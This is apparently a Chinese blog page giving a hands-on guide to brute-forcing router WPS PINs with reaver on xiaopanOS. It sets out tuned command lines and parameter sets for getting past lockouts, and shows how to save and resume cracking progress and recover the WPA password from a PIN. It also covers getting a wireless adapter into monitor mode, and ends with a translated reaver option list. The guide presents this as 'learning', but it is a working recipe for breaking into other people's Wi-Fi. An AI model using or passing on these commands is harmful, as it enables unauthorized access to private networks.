(非TP-LINK路由推荐–d9 –t9参数防止路由僵死

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)

小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子)

目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1

目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t 5  -c 1

目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d 5  -c 1

参数一:-a -n -N -x 20 -r 100:10 -| 60 -t 2 -v d 0 (我默认使用这个)

参数二:-a –v –N –x20–r100:10 l300 –t12 –d0 (如想多等会,可将–t12修改为–t15等)

参数三:-a –v –S –x20–r100:10 l300 –t12 –d0  (如重码多且速度太快,可将–d0修改为–d2)等)

参数四:-a –v –N –x20–r100:10 l300 –t12 –d0 –S(其他参数也可试一下,不要加-n)

xiaopanOS中reaver参数

-a -v -S -x 20 -r 100:10 -l 300

光盘启动、u盘/硬盘启动保存学习进度的方法

reaver1.3的保存路径:打开桌面最后边一个图标xfec 定位到/etc/reaver下,有一个wpc后缀的文件,名字是你学习的目标的mac地址,复制到你的U盘,路径是/mnt/sdb1(一般是这个,自己找找,要是没有东西就右键mount),以后重启到xiaopanOS,把这文件复制到原来的路径,再试试,可以载入进度了!o(∩_∩)o 哈哈

reaver1.4的保存路径:保存目录:/usr/local/etc/reaver如果xfe文件管理器未获得ROOT权限。请先运行root shell后输入xfe即可获得root权限。保存方法同上。下次重启动后,再手工复制到/etc/reaver/ 目录下即可

MAC地址.wpc 其实是个文本文件,格式与破密用字典酷似,其第一行和第二行,分别是4位数和3位数的指示位置数(+4)。

------------------------------------------------------------------------------

如果进度到99.9%后,AP死机,可打开它,总共1000个3位数,找出剩余的十几个PIN码,用QSS、WPS客户端软件,手动测试、破密。如果是跑了99.99%死机,  意味吗?  你懂的吧? 最后一个PIN就是。

以下这个命令是指定PIN码,获得WPA 密码PSK

reaver -i mon0 -b MAC -p PIN8位数

如果上述措施不后,仍不见PSK密码,可能因软件原因,漏码了!需要重新跑后三位数!

(前四位正确的话)reaver -i mon0 -b MAC -p PIN前4位数

1.遇见8187驱动RF-kill的  xiaopanos

对8187的网卡支持不是太好,有时会出现驱动加载不了,就是输入第一条命令后出现operation not possible due to RF-kill,我想大部分人也遇到过把。新版本0.34使用命令rfkill unblock all解决这个问题,容易出现问题的是0.3.2版本的。

第一种尝试的解决办法:这时候就断开USB,等上大概10几秒把再插上,连续插拔几次总有一次会好。

第二种尝试的解决办法:先运行一下奶瓶扫描一会,然后退出奶瓶。 虚拟机 USB图标(USB图标上的小点)由深绿变成浅绿色,变浅绿就输入

ifconfig wlan0 up

airmon-ng start wlan0

第三种解决办法:出现错误后的解决

a.Root Shell窗口敲击命令“ifconfig -a”,查看最后一项是否出现wlan0,这个就是你的无

线网卡。如果没有出现拔插网卡,直到测试出现wlan0。

b.接下来输入第二条命令“ifconfig wlan0 up”,接下来第三条“airmon-ng start wlan0”载入

网卡。如果出现operation not possible due to RF-kill,不要惊慌继续输入命令“airmon-ng start

wlan0”多输入几次,然后拔出USB网卡,再插入,重复第2步的命令。一般情况下就会

正常载入了括号内只会显示monitor mode enabled on mon0,不会出现operation not possible

due to RF-kill,如果不行以上步骤再次重复,直到解决。

c.输入“airodump-ng mon0”(如果括号内显示的是monitor mode enabled on mon1,相应的

命令就改为airodump-ng mon1,其他的类似),测试一下,要是可以正常扫描,说明8187L加载成功,就可以reaver了,你懂的!

reaver参数说明

必须参数

-i, --interface=<wlan> Name of the monitor-mode interface to use 网卡的监视接口,通常是mon0

-b, --bssid=<mac> BSSID of the target AP

AP的MAC地址

Optional Arguments: 可选参数

-m, --mac=<mac> MAC of the host system

指定本机MAC地址

-e, --essid=<ssid> ESSID of the target AP

路由器的ESSID,一般不用指定

-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) 信号的频道,如果不指定会自动扫描 -o, --out-file=<file> Send output to a log file [stdout]

输出日志文件

-s, --session=<file> Restore a previous session file

恢复进度文件

-C, --exec=<command> Execute the supplied command upon successful pin recovery pin成功后执行命令

-D, --daemonize Daemonize reaver

设置reaver成Daemon

-a, --auto Auto detect the best advanced options for the target AP 对目标AP自动检测高级参数

-f, --fixed Disable channel hopping

禁止频道跳转

-5, --5ghz Use 5GHz 802.11 channels

使用5G频道

-v, --verbose Display non-critical warnings (-vv for more) 显示不重要警告信息 -vv 可以显示更多 -q, --quiet Only display critical messages

只显示关键信息

-h, --help Show help

显示帮助

Advanced Options:高级选项

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4位或者8位pin码 -d, --delay=<seconds> Set the delay between pin attempts [1] pin间延时,默认1秒

-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts

[60]

AP锁定WPS后等待时间

-g, --max-attempts=<num> Quit after num pin attempts

最大pin次数

1/2

-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures

[0]

10次意外失败后等待时间,默认0秒 -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts 每x次pin后等待y秒

-t, --timeout=<seconds> Set the receive timeout period [5] 收包超时,默认5秒

-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] M5/M7超时,默认0.2秒

-A, --no-associate Do not associate with the AP (association must be done by another application)

不连入AP(连入过程必须有其他程序完成) -N, --no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息(如果一直pin不动,可以尝试这个参数)

-S, --dh-small Use small DH keys to improve crack speed 使用小DH关键值提高速度(推荐使用) -L, --ignore-locks Ignore locked state reported by the target AP 忽略目标AP报告的锁定状态

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet 每当收到EAP失败包就终止WPS进程 -n, --nack Target AP always sends a NACK [Auto] 对目标AP总是发送NACK,默认自动 -w, --win7 Mimic a Windows 7 registrar [False] 模拟win7注册,默认关闭

Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。

reaver使用相关的更多相关文章

  1. 嵌入式单片机STM32应用技术(课本)

    目录SAIU R20 1 6 第1页第1 章. 初识STM32..................................................................... ...

  2. wifi reaver

    PIN码的格式很简单, 八位十进制数,最后一位(第8位)为校验位(可根据前7位算出),验证时先检测前4位,如果一致则反馈一个信息,所以只需1万次就可完全扫描一遍前4位,前4位确定下来的话,只需再试10 ...

  3. 无线wifi-PJ-之在开启WPS下使用reaver

    PJ简单解释: PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组 合,一共就是一万一千个密码组合. 10的4次方+10的3次方=11000个密码组合. 当reaver确定前 ...

  4. 如何使用Reaver破解Wi-Fi网络的WPA密码

    via: http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver 译者:Mr小眼儿 本 ...

  5. ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

    路由器的WPS功能 很多路由器都有WPS功能, 这边的WPS不是office工具软件, 而是路由器的一个功能: 路由器中WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Prot ...

  6. java中的字符串相关知识整理

    字符串为什么这么重要 写了多年java的开发应该对String不陌生,但是我却越发觉得它陌生.每学一门编程语言就会与字符串这个关键词打不少交道.看来它真的很重要. 字符串就是一系列的字符组合的串,如果 ...

  7. SQL Server相关书籍

    SQL Server相关书籍 (排名不分先后) Microsoft SQL Server 企业级平台管理实践 SQL Server 2008数据库技术内幕 SQL Server性能调优实战 SQL S ...

  8. dotNET跨平台相关文档整理

    一直在从事C#开发的相关技术工作,从C# 1.0一路用到现在的C# 6.0, 通常情况下被局限于Windows平台,Mono项目把我们C#程序带到了Windows之外的平台,在工作之余花了很多时间在M ...

  9. 在ASP.NET Core应用中如何设置和获取与执行环境相关的信息?

    HostingEnvironment是承载应用当前执行环境的描述,它是对所有实现了IHostingEnvironment接口的所有类型以及对应对象的统称.如下面的代码片段所示,一个HostingEnv ...

随机推荐

  1. hdoj 1711 Number Sequence【求字串在母串中第一次出现的位置】

    Number Sequence Time Limit: 10000/5000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others) ...

  2. getting start with storm 翻译 第八章 part-1

    转载请注明出处:http://blog.csdn.net/lonelytrooper/article/details/12434915 第八章 事务性Topologies 在Storm中,正如本书前边 ...

  3. 主流H.264编码器对比测试 (MSU出品)

    俄罗斯的MSU Graphics & Media Lab (Video Group)出品的H.264编码器性能测试报告.测试了主流的H.264编码器的性能.从测试的结果来看,开源产品x264性 ...

  4. 转载:Ununtu下中文乱码解决方案

    转载: 添加中文字符编码: $sudo vim /var/lib/locales/supported.d/local #添加下面的中文字符集 zh_CN.GBK GBK zh_CN.GB2312 GB ...

  5. adb logcat命令查看并过滤android输出log

    cmd命令行中使用adb logcat命令查看android系统和应用的log,dos窗口按ctrl+c中断输出log记录. logcat日志中的优先级/tag标记: android输出的每一条日志都 ...

  6. 数据结构 - 堆排序(heap sort) 具体解释 及 代码(C++)

    堆排序(heap sort) 具体解释 及 代码(C++) 本文地址: http://blog.csdn.net/caroline_wendy 堆排序包括两个步骤: 第一步: 是建立大顶堆(从大到小排 ...

  7. [Unity-24] Unity的四种载入场景的方法

    Unity官方提供了4种载入场景(scene)的方法.各自是: 1. Application.LoadLevel():同步载入 2. Application.LoadLevelAsync():异步载入 ...

  8. [转] jquery 使用方法

    jquery 使用方法 jQuery是目前使用最广泛的javascript函数库.据统计,全世界排名前100万的网站,有46%使用jQuery,远远超过其他库.微软公司 甚至把jQuery作为他们的官 ...

  9. 使用搬瓦工搭建javaweb环境

        /* 本文是基于搬瓦工vps的centos-6-x86_64的Linux系统搭建. 需准备的工具:1.putty(用于连接Linux系统)  2.WinSCP(搬瓦工官方提供的ftp上传下载工 ...

  10. CSS实现背景透明而背景上的文字不透明完美解决

    在我们设计制作一些网页的时候可能会用到半透明的效果,首先我们可能会想到用PNG图片处理,当然这是一个不错的办法,唯一的兼容性问题就是ie6 下的BUG,但这也不困难,加上一段js处理就行了.但假如我们 ...